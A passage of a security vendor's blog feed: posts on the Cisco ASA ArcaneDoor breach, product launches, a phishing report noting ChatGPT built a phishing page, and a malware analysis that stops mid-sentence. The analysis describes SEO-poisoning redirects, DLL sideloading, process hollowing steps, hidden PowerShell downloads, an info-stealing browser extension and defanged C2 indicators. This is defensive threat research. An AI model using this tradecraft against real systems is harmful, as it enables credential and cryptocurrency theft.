https://www.zscaler.com/ Zscaler Blog — News and views from the leading voice in cloud security. en https://www.zscaler.com/blogs/product-insights/cisco-asa-firewall-breach-what-do-when-security-target The Year of the Dragon has seen some notable events so far: a total eclipse, Facebook’s 20th anniversary, and another Taylor Swift streaming record. But 2024 has also become the Year of the Hardware Vulnerability, with multiple VPNs and firewalls suffering zero-day vulnerabilities that bad actors are actively exploiting. On April 24, Cisco issued a warning that a nation-state supported threat actor had compromised its Adaptive Security Appliances (ASA). ASA integrates a firewall and VPN with other security features. This campaign, known as ArcaneDoor, involved the exploitation of two zero-day vulnerabilities (CVE-2024-20353, CVE-2024-20359) that targeted government networks worldwide. The threat actor deployed two backdoors: Line Dancer allowed them to run custom malware in the memory of network appliances, spy on network traffic, and steal data. Line Runner gave them persistent access to target devices, even after reboots or updates. As of this writing, the initial attack vector is unknown. This hacking campaign may be targeting devices other than the ASA, exploiting other unknown flaws to access and exploit the Cisco ASA vulnerability. Another day, another CVECisco’s disclosure and warning about the ArcaneDoor hacking campaign comes at a time when critical CVEs have been identified for Ivanti, SonicWall, Fortinet, Palo Alto Networks, and other Cisco VPN solutions. This recurring pattern highlights a concerning trend: threat actors are specifically targeting security appliances like firewalls and VPNs, exploiting their vulnerabilities in an attempt to gain access to the very environments they are designed to protect. These attacks indicate that the issue is not limited to any one vendor. Rather, it is the underlying legacy architecture of the devices that makes them lucrative targets. Decoding the architectural flawsThe big question on security and network architects’ minds today: why are perimeter-based security and hub-and-spoke network architecture susceptible to attacks? Decades ago, firewalls and VPNs were vital parts of an organization’s security. Employees mainly worked in offices, there were no smart lights or smart printers, and sophisticated cyberattacks on employees were more fiction than reality. Today’s complex, advanced cyberattacks weren’t yet widespread. Today's organizations are highly distributed and dynamic. The internet is the corporate network, with users, workloads, and IoT/OT devices connecting from various locations. By design, firewalls and VPNs have public-facing IP addresses that sit on the public internet so authorized users can traverse the web and find the entry points into the organization’s environment. This architectural flaw is where the problem lies: anyone, including threat actors, can discover these entry points. Even more concerning, everything within a traditional network is considered "trusted." This enables threat actors to establish a foothold in the network and move laterally, compromising the entire environment. How to protect yourself with zero trust securityThe best defense against zero-day attacks is to embrace zero trust security. Zero trust architecture is inherently different from traditional architectures that rely on firewalls and VPNs. Based on the principle of least privilege, it minimizes the internal and external attack surface, terminates and fully inspects all connections, and establishes one-to-one connectivity between authenticated users and applications without exposing the enterprise network. An effective zero trust approach drastically reduces the risk of successful exploits as well as the impact of a compromise. A cloud native, proxy-based zero trust architecture like the Zscaler Zero Trust Exchange: Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses. It allows no inbound connections and hides applications behind a zero trust cloud. Stops compromise by inspecting all traffic, including encrypted traffic, at scale. This enables policy enforcement and real-time threat prevention. Eliminates lateral threat movement by connecting entities to individual IT resources instead of the entire network. Blocks data loss by enforcing policies across all potential leakage paths, including encrypted traffic. This ensures the protection of data in motion, at rest, and in use. Best practices to protect against zero-day attacksThe Zscaler ThreatLabz research team recommends these best practices to protect your organization against exploits: Minimize the attack surface. Make applications (including vulnerable VPNs) invisible to the internet, ensuring that attackers cannot gain initial access. Prevent initial compromise. Inspect all traffic inline to automatically stop zero-day exploits, malware, or other sophisticated threats. Enforce least-privileged access. Restrict permissions for users, traffic, systems, and applications with identity and context, ensuring only authorized users can access named resources. Block unauthorized access. Use strong multifactor authentication (MFA) to validate user access requests. Eliminate lateral movement. Connect users directly to applications, not the network, to limit the blast radius of a potential incident. Shut down compromised users and insider threats. Enable inline inspection and monitoring to detect compromised users with access to your network, private apps, and data. Stop data loss. Inspect data in motion and at rest to prevent active data theft during an attack. Deploy active defenses. Use deception technology with decoys, and perform daily threat hunting to derail and stop attacks in real time. Test your security posture. Obtain regular third-party risk assessments and conduct purple team activities to identify and fix gaps in your security. Ask your service providers and technology partners to do the same, and share findings with your security team. The road aheadThe increased targeting of VPNs and firewalls by threat actors highlights the flaws of traditional perimeter-based architectures. With lucrative gains to be had, these attacks will continue. Organizations must prioritize patching critical vulnerabilities as soon as possible. However, to truly stay ahead of zero-day attacks, adopting zero trust is the most effective approach. A zero trust architecture will enable organizations to minimize the attack surface, enforce strict access controls, and continuously monitor and authenticate users and devices. This proactive approach to security will help mitigate zero-day risks and ensure a more robust, resilient defense in the future. Referenceshttps://www.wired.com/story/arcanedoor-cyberspies-hacked-cisco-firewalls-to-access-government-networks/ https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/ If you’re concerned about how these vulnerabilities could affect your organization, contact us at [email protected] for a free external attack surface assessment as well as an expert consultation on how you can migrate from legacy architectures to zero trust. Fri, 26 Apr 2024 10:16:35 -0700 Apoorva Ravikrishnan https://www.zscaler.com/blogs/product-insights/cisco-asa-firewall-breach-what-do-when-security-target https://www.zscaler.com/blogs/product-insights/step-future-zdx-3-exciting-new-features-zdx-copilot-data-explorer-and-hosted Many organizations face challenges supporting a distributed workforce, and pressure on IT resources continues to increase. Zscaler is relentlessly focused on enhancing our Digital Experience platform to empower IT operations and service desk teams to deliver the best end user experiences for their distributed workforces. Not long ago, we announced an ML-based Root Cause Analysis feature that helps IT teams quickly discover the root cause of issues. Using AI and ML for precise issue detection and root-cause analysis helps teams swiftly resolve support tickets by reducing mean time to resolution (MTTR) and mean time to detection (MTTD). We’re very excited to introduce three new advancements that will further assist IT teams in improving efficiency, visibility, and collaboration across IT operations, service desk, and security teams. ZDX Copilot: Revolutionizing IT Operations with AI The ZDX Copilot is an AI-driven virtual assistant designed to simplify and enhance IT operations through an advanced conversational interface. By integrating AI into the core of our network operations tools, ZDX Copilot allows users to interact with their systems using natural language. ZDX Copilot taps into the power of pre-trained LLMs to provide a conversational interface and interpret questions within the context of ZDX. “Show me the user experience for Hiren” Copilot links symptoms (e.g., network drops) to potential causes (Wi-Fi issues, network latency, etc.) and leverages historical data to enable accurate diagnostics. The large language model (LLM) uses input from time series data like the web probes, CloudPath probes, device events, process stats, and hundreds of other time-series metrics to help with the analysis. How It Works The IT admin initiates the conversation with the Copilot: "Could you please look at this user and find out the root cause of the bad score?" The LLM then collaboratively examines the data from various angles, asks clarifying questions if needed, and provides its analysis. Copilot Workflow Initiated Query: An IT admin starts the analysis by asking the LLM (in natural language) to analyze a particular data point. For instance, "Why is John Doe having poor sharepoint experience?" Automated Data Retrieval: The system fetches the data pertaining to the query (in this case for the specific user John Doe) and presents it to the LLM. Analysis by LLM: The LLM processes the data and provides the output/analysis to the ZDX admin. Drill Down: The admin can further ask the LLM to drill down into specifics. For example, "Tell me more about the network slowness observed.” Here are a few examples of the types of questions an ZDX admin could ask the Copilot: "Which users are having a poor Wi-Fi experience?" "Show me John Doe’s CPU utilization" “Troubleshoot the user experience for Linda Lucas” Let’s go through an example: I am asking ZDX Copilot to troubleshoot my user experience: “Troubleshoot Vikas Srivastava’s experience for the last 24 hours” Since in this case I have two devices; Copilot asks me about the device I would like to run the troubleshooting for. After that, it fetches the data from ZDX and provides a detailed analysis of the user experience for me and outlines possible causes that could be impacting my ZDX score. From here, I went to the ZDX user details page to search for the issue impacting my Wi-Fi. In doing so, I can validate what Copilot told me about my Wi-Fi and take remediative actions. Now take a step back and think about how much time it took me to merely ask a question in a conversational manner to Copilot and get to the root cause of the problem. The amount of time ZDX could save for your IT teams and helpdesk is substantial. Take a look at this analysis we did on the financial savings it could provide to you. https://info.zscaler.com/resources-white-papers-calculating-the-financial-value-of-zdx ZDX Hosted Monitoring: Continuous Network Performance Monitoring Expanding on our robust monitoring solutions, Zscaler Hosted Monitoring offers a service that operates continuously across multiple vantage points worldwide. This feature is designed to monitor and benchmark network performance, providing a seamless, comprehensive overview of your network's health and activity. Zscaler Hosted Monitoring The Zscaler Zero Trust exchange is distributed across more than 150 data centers on six continents, enabling users to access services securely from any device, any location, and over any network. You can now monitor the performance of your business-critical and customer-facing services 24/7 from these locations. With this continuous monitoring, you can apply: Application availability monitoring: Ensure that your external applications perform at their best, no matter where your customers are located Circuit monitoring: Ensure SLAs for applications and services you purchase from SaaS, cloud, data center, or network providers Performance monitoring: Confidently roll out new applications or expand into new regions as your business grows organically or by M&A Vantage PointA geographical location from where monitoring probes originate from. At launch, the available vantage points locations include::San Jose Washington DC Chicago Frankfurt Zurich Amsterdam With more to be added in the future, these strategic locations ensure that Zscaler Hosted Monitoring covers a broad spectrum of the network landscape, offering diverse insights into global network performance. Getting started with Hosted Monitoring is straight-forward Collections: Under the Configuration section of ZDX Hosted Probes, we have Collections, a grouping mechanism for the probes you would configure for the monitored destinations. For example, you could have a collection dedicated to mission-critical applications, one for HR, another one for Finance, etc. Hosted Monitoring Configuration Looking at the Metrics From the Zscaler Hosted Monitoring dashboard, you can analyze the time-series data collected from various vantage points. You can even select a specific vantage point of interest and see the metrics from that vantage point’s perspective. Zscaler Hosted Monitoring Dashboard Once you select a data point on the scatter plot, you get detailed insights like DNS response times, TCP connect times, SSL handshake times, server response time, time to last byte (TTLB), page fetch time (PFT), the time series data for the web, and CloudPath along with specifics for the probe data like DNS response times. From the waterfall details below; you can exactly see the time distribution of the different measured metrics (page fetch time, SSL handshake time, etc.) and easily understand the attribute of the page load which is taking the most time. Zscaler Hosted Monitoring Metrics Now let's look at the CloudPath data. Below are all the ISP paths detected to the configured destination (on different DNS resolutions). You can see the ISP information; latency between different hops to quickly pinpoint bottlenecks (highlighted in yellow). ZDX Data Explorer: Advanced Data Querying and Reporting ZDX Data Explorer is a sophisticated tool that enables detailed data analysis and reporting. Users can customize queries and generate reports based on various selectable fields such as applications, metrics, and grouping or aggregation preferences. This flexibility supports a detailed examination of data to uncover operational insights and trends. While building your query, you can select the Applications you are interested in and the specific metrics you would like to report on, such as: ZDX Score Device Count User Count DNS Time Page Fetch Time Web Request Availability Latency Packet Count Packet Loss Number of Hops You can group these by Applications, Zscaler Locations, Geolocations, Departments Data Explorer is valuable for engineers and managers: Engineers can troubleshoot problems by comparing similar services or applications to expose differences and anomalies across time managers and leaders can analyze trends that show how the team has achieved their KPIs, or uncover areas for optimization. Conclusion With these new capabilities, your teams can rely on Copilot as their AI assistant to ask and get answers to all your app, network, and device performance questions; use Hosted Monitoring to ensure that no customer or employee suffers from a poor digital experience; visualize trends with Data Explorer to troubleshoot issues, or to quantify IT’s contributions to optimizing digital experience, and, thereby, improve business results. To learn more about these innovations, watch our webinar, sign up for a demo, and review the latest features today! Thu, 25 Apr 2024 04:26:01 -0700 Vikas Srivastava https://www.zscaler.com/blogs/product-insights/step-future-zdx-3-exciting-new-features-zdx-copilot-data-explorer-and-hosted https://www.zscaler.com/blogs/company-news/ams-executive-partner-summit-recap After hosting more than 100 partner executives at our Zscaler Executive Partner Summit, we are going into this week feeling both immensely grateful and highly energized. Time is our most valuable asset, and having the opportunity to engage with so many of our partner leaders from across the Americas was a humbling and inspiring experience. During the two-day summit, we showcased to our partner executives the ongoing strategic investments that Zscaler is making in our Partner Ecosystem and how we can help them continue to grow and accelerate their business with us. Our internal teams have certainly experienced the momentum and vision that we have for our Partner Ecosystem. Being able to host senior executives from our most strategic partners to share that vision with them, experience the excitement together for the opportunity that lies ahead, and discuss the momentous milestones that we’ll soon conquer together truly ignites our teams as we propel towards our joint-mission and goals. As Zscaler continues to grow and evolve on our journey to $5 billion ARR, we’ve welcomed many new leaders across our global organization. With their experience, talent, and fresh perspectives, we’re accelerating like never before. At the same time, our focus on partners has never been stronger—we’re implementing new, elevated strategies that will unlock growth opportunities for our partners, forging both greater partner alignment, innovation, and unprecedented business momentum. From global partner engineering and M&A to customer success, business development, sales, and beyond, every corner of Zscaler is investing in and aligning on partner success in new, dedicated ways. Our goal is to ensure that as Zscaler grows and succeeds, our partners excel alongside us. Beyond the executive presentations, technical breakout sessions, and impactful 1:1 meetings throughout the summit, we couldn't miss an opportunity to properly celebrate everything our partners have accomplished this year. We celebrated their achievements and successes in a night of Yacht Rock sailing the night away with live music, dinner, and discussions as we looked towards our exciting journey together in our next phase of monumental growth. Reflecting on the event, we are filled with gratitude and confidence in what lies ahead for our partner organization. We are fortunate to work with some of the greatest leaders and partner organizations in the world. It’s exciting to welcome amazing new leaders as we continue to make smart investments in partner success; delivering predictability and more opportunities than ever before for our Zscaler partners to win alongside us. Want to experience the excitement and energy at this year’s Partner Summit? Check out the complete recap video above! Thu, 25 Apr 2024 10:35:51 -0700 Karl Soderlund https://www.zscaler.com/blogs/company-news/ams-executive-partner-summit-recap https://www.zscaler.com/blogs/company-news/zscaler-digital-experience-just-got-smarter-and-wiser-introducing-new-ai Businesses rely on technology to keep employees productive - organizations with 250+ employees use more than 100 SaaS apps, and todays’ end users expect flawless digital experiences when interacting with customer support, placing orders, or using online services. IT teams are the bedrock of these businesses, keeping their technology running smoothly. They must ensure that all networks, applications, and services - even those that they don't control - are always on and reliable. To this end, Zscaler is excited to introduce three new advancements that will significantly help IT teams improve efficiency, visibility, and collaboration across IT operations, service desk, and security teams. Copilot is an AI Assistant that leverages cutting-edge generative AI to answer all your app, network, and device performance questions, and offer domain-specific expertise. Hosted Monitoring enables you to continuously monitor applications and services from Zscaler-hosted, globally distributed locations to help you ensure that no customer or employee suffers from poor digital experiences. Data Explorer enables you to easily build and share customized reports that visually correlate data drawn from diverse datasets for uses ranging from troubleshooting to demonstrating IT’s impact on business performance. To learn more about these innovations, read on and watch the launch webinar where we dive deeper into these capabilities, why they are important for IT and security teams, and how you can use them. Introducing ZDX Copilot: Your AI-powered Assistant Unlike endpoint and network monitoring tools, Zscaler Digital Experience (ZDX) gathers performance metrics from 500T daily signals, and 390B daily transactions, across end user devices, networks, and applications. This simplifies your monitoring stack with a consolidated view and makes it easier to detect and fix performance issues. IT teams have to grapple with vast amounts of performance data across devices, networks, and applications. So, in May 2023, we introduced AI-powered problem detection and root cause analysis to help them accurately detect performance anomalies that can impact digital experience and make it significantly easier to isolate root cause of issues, fix them quickly, and put employees back to work faster. Today, ZDX Copilot takes us a step farther. ZDX Copilot, your AI assistant, unlocks productivity for IT teams by empowering them to get the information they need using a simple sequence of questions. Teams across IT and security benefit from using Copilot: Service desk teams Networking teams Security teams IT leaders can isolate root cause of user complaints to efficiently triage tickets and collaborate with other teams; they can also easily look up technical information can conversationally perform deep analysis across networks, applications, and regions to identify trends or find opportunities for optimization can ensure that their services are performing at all times as well as instantly expose root cause of issues and affected parties when performance lags can conveniently extract and present digital experience trends and performance insights to show progress or identify new opportunities ZDX Copilot is versatile and can be used in many ways: IT employees across functions can upskill themselves, automate tasks, draw digital experience insights, and perform deep analysis. Continuously Monitor Customer-Facing and Business-Critical Web Applications with the All-New Hosted MonitoringEarlier this year, Microsoft had connectivity issues impacting Azure, Teams, Outlook, and SharePoint for 90 minutes. Square had a DNS configuration issue, and its customers were unable to process transactions for more than 18 hours. You have likely heard about these outages, but these are only two of many more that happened. ISP, cloud service, and SaaS issues can have an enormous impact on employee productivity, customer experiences, and business performance. This is why it’s important to extend our monitoring strategy to all ISPs, applications, and services that our employees and customers across all locations rely on to connect to our business and customer-facing applications. With Zscaler Digital Experience Hosted Monitoring, you can monitor applications, such as an eCommerce website, from every region your customers are in. The Zscaler Zero Trust Exchange is distributed across more than 150 data centers on six continents, which enables users to access services securely from any device, any location, over any network. You can now continuously monitor performance of your business-critical and customer-facing applications and services from several of these locations. With continuous monitoring, you can: Ensure that your external websites perform at their best, no matter where you customers are located Monitor SLA compliance for applications and services you purchase from SaaS, cloud, datacenter, or network providers Confidently roll out new applications or expand into new regions as your business grows, whether organically or through M&A To learn more about how you can maximize your impact using hosted monitoring, review this eBook. Analyze Your Data Your Way with Data ExplorerFinally, ZDX has made it incredibly easy to gather trends and insights that are relevant to you, your team, and your business. With the new Data Explorer you simply select your applications, pick the metrics that you’d like to analyze, choose how to organize and manipulate your data, and pick the widgets using which you can visualize the results. Data Explorer provides value for engineers and managers in the following ways: Engineers can troubleshoot problems by comparing similar services or applications to expose differences and anomalies across time Managers and leaders can analyze trends that show how their team achieves their KPIs or to uncover areas for optimization How to Unlock These CapabilitiesZDX Copilot and Hosted Monitoring are available with ZDX Advanced Plus, while Data Explorer is available with ZDX Advanced and ZDX Advanced Plus. For a closer look at the various versions of ZDX, please review this comparison. Your Next StepsWith these new advancements, ZDX provides richer network and app telemetry, helping everyone in IT perform their tasks with maximum efficiency. Copilot, Hosted Monitoring, and Data Explorer give IT teams instant access to massive knowledge repositories using GenAI, so team members can upskill themselves and work collaboratively with speed and accuracy. To learn more about these innovations, watch our webinar, or request a demo. Thu, 25 Apr 2024 03:00:01 -0700 Krishnan Badrinarayanan https://www.zscaler.com/blogs/company-news/zscaler-digital-experience-just-got-smarter-and-wiser-introducing-new-ai https://www.zscaler.com/blogs/security-research/phishing-attacks-rise-58-year-ai-threatlabz-2024-phishing-report Phishing threats have reached unprecedented levels of sophistication in the past year, driven by the proliferation of generative AI tools. Transforming how cybercriminals operate, AI advancements are revolutionizing and reshaping the phishing threat landscape. Moreover, this technology has democratized the ability to orchestrate intricate phishing campaigns, making it easier than ever for even beginners to conduct complex and believable phishing attacks. Specifically, this observed shift is enabling novice cybercriminals to launch highly convincing, personalized scams with ease. As a result, organizations now face a myriad of new challenges in protecting their data and systems from the increasing onslaught of phishing attacks. In response, the Zscaler ThreatLabz team has released the 2024 Phishing Report. This report analyzes over 2 billion phishing transactions from 2023, found within the Zscaler cloud, to equip organizations with a clear understanding of the rapidly evolving phishing landscape. Providing insights into the latest trends and tactics used by cybercriminals, the report highlights active phishing campaigns, exposes emerging schemes, and identifies top targets by region, industry, imitated brand, and more. Showcasing real-world examples, ThreatLabz phishing findings underscore the importance of applying constant vigilance and zero trust security strategies. The guidance offered aims to help organizations strengthen their defenses against these evolving phishing techniques.Download the Zscaler ThreatLabz 2024 Phishing Report to gain the knowledge needed to proactively combat the rising wave of new phishing threats. 6 key phishing findingsThe following findings represent a subset of key phishing trend discoveries that shed light on the evolution of phishing tactics. Top phishing trends Phishing attacks surged by 58.2% in 2023 compared to the previous year, reflecting the growing sophistication and reach of threat actors. Voice phishing (vishing) and deepfake phishing attacks are on the rise as attackers harness generative AI tools to amplify their social engineering tactics. Adversary-in-the-middle (AiTM) phishing attacks persist and browser-in-the-browser (BiTB) attacks are emerging as a growing threat. Top phishing targets The US, UK, India, Canada, and Germany were the top five countries targeted by phishing attacks. The finance and insurance industry faced 27.8% of overall phishing attacks, marking the highest concentration among industries and a 393% year-over-year increase. Microsoft remains the most frequently imitated brand, with 43.1% of phishing attempts targeting it. Discover further insights into each of these findings and more in the report. Spotlight on AI-enabled phishing threatsGenAI has undoubtedly proven transformative in turning up productivity across businesses. Yet on the flip side of this transformation is a perilous truth: AI is also turning novice to average threat actors into skilled social engineers and sophisticated phishing attackers.By automating and personalizing various components of the attack process, AI speeds up and refines phishing attacks, making them more sophisticated and difficult to detect. GenAI quickly analyzes public data, such as information about organizations and executives, saving time in reconnaissance for threat actors and enabling more precise targeted attacks. LLM chatbots craft accurate, believable phishing communications and emails by eliminating misspellings and grammar mistakes. GenAI can swiftly generate convincing phishing pages. The ThreatLabz report showcases how ChatGPT created a phishing login page in less than 10 prompts, and provides key indicators to look out for when identifying a phishing page. AI has blurred the line between authentic and fraudulent content, making it all the more challenging to discern phishing schemes from legitimate web pages and digital communication.As ThreatLabz researchers tracked phishing trends throughout 2023, several notable advanced AI tactics also emerged. Among these were the rise of vishing and deepfake phishing, increasingly favored social engineering tactics that use AI-powered impersonation tools. Vishing insightsAdvanced vishing campaigns are gaining popularity globally, leading to substantial financial losses in some cases. In a notable attempt that ThreatLabz thwarted during the summer of 2023, phishing attackers used AI technology to perpetrate a vishing attack by impersonating Zscaler CEO Jay Chaudhry. The report details the sequence of events, serving as a critical reminder for enterprises and employees to stay vigilant against vishing scammers. ThreatLabz anticipates a continued surge in targeted voice phishing campaigns led by groups like Scattered Spider in the next year. As these efforts aim to acquire employee login credentials, it is imperative for organizations to fortify their phishing defenses to prevent unauthorized access and exploitation. Deepfake insightsPhishing attacks involving deepfakes will be one of the most challenging AI-driven cyberthreats. Threat actors now possess the ability to create video content that precisely and accurately replicates faces, voices, and mannerisms. This manipulation has already manifested in concerning ways, such as in the electoral process, where deepfake videos fabricate false narratives or statements from political figures. These videos can sway public opinion, disseminate disinformation, and erode trust in the integrity of the electoral process. As society becomes more and more reliant on digital communication and media consumption, the potential political and life-altering ramifications of deepfake scams will likely extend far beyond the scope of current applications. From financial scams to corporate espionage, the use of deepfake technology poses a significant threat to organizations, individuals, and society at large.Additionally, ThreatLabz observed a rise in QR code scams, recruitment scams, browser-in-the-browser (BitB) attacks, and adversary-in-the-middle (AiTM) attacks. Learn more about each of these schemes in the report. Mitigate phishing risk with zero trustGiven the concerning threat landscape uncovered by this year’s report, how can organizations protect against the latest phishing threats? One definitive solution lies in establishing a foundation of a zero trust architecture. Adapting security strategies to combat new phishing trends and mitigate associated risks is crucial—and zero trust is a proven strategy.The Zscaler ThreatLabz 2024 Phishing Report provides essential guidance to this end, including: Fighting AI with AI: Learn about Zscaler’s AI-powered phishing prevention capabilities needed to combat AI-driven threats, including preventing browser exploitation from phishing pages with Zscaler Browser Isolation Zero trust architecture advantages: Learn how the Zscaler Zero Trust Exchange prevents traditional and AI-driven phishing at multiple stages of the attack chain: Prevent compromise: TLS/SSL inspection at scale, AI-powered browser isolation and policy-driven access controls prevent access to suspicious websites. Eliminate lateral movement: Users connect directly to applications, not the network, while AI-powered app segmentation limits the blast radius of a potential incident. Shut down compromised users and insider threats: Inline inspection prevents private application exploit attempts, and integrated deception capabilities detect the most sophisticated attackers. Stop data loss: Inspection of data in-motion and at-rest prevents potential theft by an active attacker. Foundational security best practices: Learn fundamental security best practices to enhance overall resilience to phishing attacks. Download your copy of the Zscaler ThreatLabz 2024 Phishing Report today. Phishing attacks will persist and remain a pervasive threat to organizations. By understanding the latest phishing trends, assessing the associated risks, and recognizing the implications of AI-driven attacks, your organization will be better equipped to defend against phishing in 2024 and beyond. Tue, 23 Apr 2024 08:17:50 -0700 Deepen Desai https://www.zscaler.com/blogs/security-research/phishing-attacks-rise-58-year-ai-threatlabz-2024-phishing-report https://www.zscaler.com/blogs/security-research/black-hat-seo-leveraged-distribute-malware IntroductionZscaler ThreatLabz researchers recently encountered a significant number of websites associated with fraudulent activities being hosted on popular web hosting and blogging platforms. Threat actors intentionally create these sites to spread malware by using the proliferation of web hosting platforms to manipulate search engine results – something called SEO poisoning, a subset of Black Hat SEO techniques. This catapults their fraudulent site to the top of a user's search results, increasing the likelihood of inadvertently selecting a malicious site and potentially infecting their system with malware. These sites don't belong to any specific category, as they encompass a wide range of interests such as pirated software, gaming, traveling, and food recipes. The broad coverage seems aimed at further ensuring their visibility in internet search results. In this blog, we delve into the tactics employed by threat actors to distribute malicious information stealers, and evade detection using obfuscation and anti-debugging techniques. Key Takeaways Threat actors utilize fraudulent websites hosted on popular legitimate platforms to spread malware and steal data. To evade detection, attackers employ obfuscation methods and checks on referral URLs. They redirect users based on whether users access the site directly or through a search engine. Malicious payloads are delivered through multi-level zipped files, often hidden within seemingly innocuous content. Users may unknowingly execute these payloads during software installations. Once executed, malicious DLLs and scripts perform activities such as process hollowing, DLL sideloading, and executing PowerShell commands to download additional malware and initiating communication with command-and-control (C2) servers. The malware gathers extensive data including system information, browser data, credentials, and browsing history. It also monitors emails pertaining to cryptocurrency exchanges and possesses the capability to modify email content, as well as potentially steal one-time authentication codes. Looks Can Be DeceivingThe screenshot below is an example of a fraudulent website being hosted on Weebly that could appear in Google search results when users perform related searches. Even though the webpage appears legitimate and has a “Powered by Weebly” label, it’s actually dangerous. This combination of seeming authentic and being associated with Weebly, a real and reputable platform, makes it more likely that users will download malware without realizing it. Figure 1: An example of a scam website hosted on Weebly. How It WorksThe sequence begins with threat actors creating a fake site on a web hosting service, which remains undetected by the hosting service itself. When a user searches for relevant information and clicks on a link from the search results, they unknowingly access the malicious site. Interestingly, if the user directly enters the URL instead of clicking on the link, it bypasses this interaction, potentially to avoid analysis by security researchers – a topic further explored in the next section. Evasion techniquesThreat actors employ checks on these malicious sites designed to evade detection by researchers. Upon loading, they verify the referral URL. If it originates from search engines like Google, Bing, DuckDuckGo, Yahoo, or AOL, the site proceeds to the next page. If the user accesses the website directly, indicating potential analysis, the site avoids redirection. The following screenshot showcases an obfuscated script which checks and redirects users accordingly. Figure 2: The obfuscated code responsible for checking and redirecting users to evade detection. This obfuscation method employs string concatenation and mathematical manipulation to hide the code's logic. It combines strings or arrays to create expressions and manipulates values through mathematical operations to make the code more difficult to understand. The screenshot below shows the decoded JavaScript code that’s hidden in the heavily obfuscated code mentioned above. Figure 3: The decoded JavaScript code hidden in the heavily obfuscated code. Payload deliveryConsider a scenario where a user searches for a cracked version of software on a search engine. One of these malicious websites may prominently feature in search results, where the user proceeds to select one. Once the above-mentioned script confirms that the user landed on the page through a search engine, it displays a fake MediaFire page hosted on Weebly.com that appears legitimate. However, instead of cracked software, the user may inadvertently download malware, thus initiating the malicious payload delivery. As an example, the figure below shows a comparison of a fraudulent and legitimate MediaFire page. Both pages are similar; however, examining the URL provides clear indications that one of them is fraudulent because it does not use the MediaFire domain. Figure 4: A comparison of a fake and legitimate MediaFire page. The payload file downloaded from the fake MediaFire page has a two-level zipped structure. Upon extracting the first ZIP archive, the victim will find another ZIP archive inside. This secondary ZIP archive is password-protected and the password is located in an image inside the first ZIP archive. This represents the second technique employed by attackers to evade detection. The screenshot below depicts the two-level zipped structure. Figure 5: The files after extracting two ZIP archives. Upon executing the extracted setup.exe file, the installation process initiates. This setup file will install the genuine GNU Privacy Guard, an OpenPGP cryptographic software suite widely utilized to enhance the security of email communications. During the installation process, we have observed that alongside setting up the genuine GNU Privacy Guard (GPG), a malicious DLL is also dropped into the same directory. This DLL utilizes DLL sideloading techniques to execute malicious activities under the guise of legitimate processes. The screenshot below shows the malicious DLL within the directory. Figure 6: A screenshot of the malicious DLL libgcrypt-20.dll loaded using DLL sideloading. Subsequently, this malicious DLL begins executing its activities. To evade detection, it triggers the execution of explorer.exe and utilizes process hollowing techniques. Below, we outline the steps involved in the process. The attacker exploits an undocumented API, CreateProcessInternalA, to initiate a suspended explorer.exe process, then utilizes NtQueryInformationProcess to acquire its base address. After replacing legitimate content with the malicious payload via NtUnmapViewOfSection, VirtualAllocEx allocates memory within the target process. WriteProcessMemory copies the payload, and ResumeThread resumes execution, completing the injection process. Furthermore, explorer.exe will initiate the execution of the PowerShell executable, passing along a malicious command-line argument, -windowstyle hidden, to the PowerShell console. The screenshot below shows the decoded version of this command-line argument. This command-line instructs PowerShell to download a heavily obfuscated script from a specified URL. Subsequently, it replaces certain special characters with alphabetical characters. The resulting string is decoded using the FromBase64String method. The decoded Base64 string undergoes XOR operations with the values 167 and 18. The screenshot below shows the malicious command-line argument. Figure 7: The malicious command-line argument. The screenshot below depicts a section of the Base64-encoded file retrieved from the URL provided. This special character replacement prior to decoding is specifically designed to evade detection by antivirus software, enhancing the malware's ability to bypass security measures effectively. Figure 8: The malicious file Base64-encoded file with special character replacement. This file exhibits multilayered obfuscation. After undergoing the initial level of deobfuscation, certain parts of the script remain obfuscated. Additionally, there are segments of code included within the script responsible for deobfuscating these encoded portions. The screenshot below shows the second level of deobfuscation. Figure 9: The second level of deobfuscation. The obfuscated script primarily consists of JavaScript files related to a malicious browser extension. Upon execution, PowerShell will drop multiple files into the directory at C:\Users{username}\AppData\Local\Default\ and create a browser shortcut on the user’s Desktop. The target path for this shortcut will point to the malicious browser extensions located at "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\test\AppData\Local\Default". The --load-extension is a command-line option used with certain web browsers. It allows users to load extensions into the browser during startup. The screenshot below shows the files associated with the browser extensions. Figure 10: Files related to the browser extensions. The screenshot below shows the manifest.json file associated with this malicious extension. The file includes: The list of permissions required by the browser extension. Numerous JavaScript files, all of which are heavily obfuscated. Attempts to disguise itself as a Google Drive extension. Figure 11: The manifest.json related to the extension. Network AnalysisAfter the initial execution through DLL sideloading, a malicious PowerShell script establishes communication with aprel88[.]com/getLicenseInfo.php?requirements=time&checkMethod=2 through a GET request. The malicious hollowed explorer.exe process initiates two transactions to download a malicious DLL from t9z[.]lol/imvLbzv05W and a BIN file from 1blob[.]monster/pidaras/142.bin. Subsequently, the malicious DLL is executed using rundll32.exe. Further malicious activity is observed which was linked to a PowerShell script. Notably, the domain good2-led[.]com is identified as the source responsible for downloading files associated with a browser extension. The screenshot below shows the malicious network traffic. Figure 12: A screenshot of the malicious traffic. Upon initiating the Chrome browser through its shortcut, a malicious extension is loaded, triggering communication with a malicious C2 server. Before this communication takes place, the extension sends a request to blockchain.info, specifically to the URL blockchain.info/address/{address}, utilizing the Bitcoin address bc1qnxwt7sr3rqatd6efjyym3nsgxhslyzeqndhjpn. In response, the extension retrieves a Base58-encoded string, which upon decoding, discloses the location of the C2 server. The address 1A9mJv7MHkSzMqe4TEdfyttEz9ZcZugyLR was returned as a result of this request. Decoding this string reveals the domain dark-confusion[.]com, which corresponds to the aforementioned address. Information TheftAfter initiating communication with the C2 server, the malicious extension engages in information theft, gathering a wide range of data including: System information Browser cookies Browser fingerprints Credentials Machine information Browser extensions Extension permissions Cookies Browser history During communication with the C2 server, the malware responds with a list of strings such as: onedrive bankofamerica.com billing ads.microsoft.com secure digicert coinbase evernote crypto admin Note: It's important to monitor traffic associated with these keywords. See the Indicators Of Compromise (IOCs) section at the end of the blog for additional strings associated with stealer activity. Additionally, it possesses the capability to inject code into web-based email applications through two JavaScript files: gmail.js and main.js. It specifically targets messages related to cryptocurrency trading across various exchanges such as OKX, Binance, Bybit, Gate, Poloniex, Mexc, Bitget, Kucoin, Huobi, and Lbank. Figure 13 and 14, shown below, show a portion of the script responsible for these activities. The script employs the checkWithdrawalLetter function, highlighted in the screenshot below, to 